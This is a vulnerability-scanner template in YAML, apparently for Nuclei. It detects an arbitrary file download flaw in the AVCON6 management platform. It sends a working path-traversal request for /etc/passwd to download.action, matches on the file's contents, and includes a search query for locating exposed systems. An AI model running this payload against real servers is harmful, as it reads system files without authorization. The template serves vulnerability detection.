41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: avcon6-lfi
|
|
|
|
info:
|
|
name: AVCON6 - Arbitrary File Download
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
File Download vulnerability in the download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
|
|
reference:
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="AVCON-6"
|
|
tags: avcon6,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/download.action?filename=../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream"
|
|
- "filename="
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100bc45d49b1e159592c25ee0724f653f23225c2b5a9f3a8dde7e9aaf146174f1240220183fad7dfa0acfbc49edc5df5bd1648c74a9b358cebfcd9e6f0cf21c6e01877a:922c64590222798bb761d5b6d8e72950
|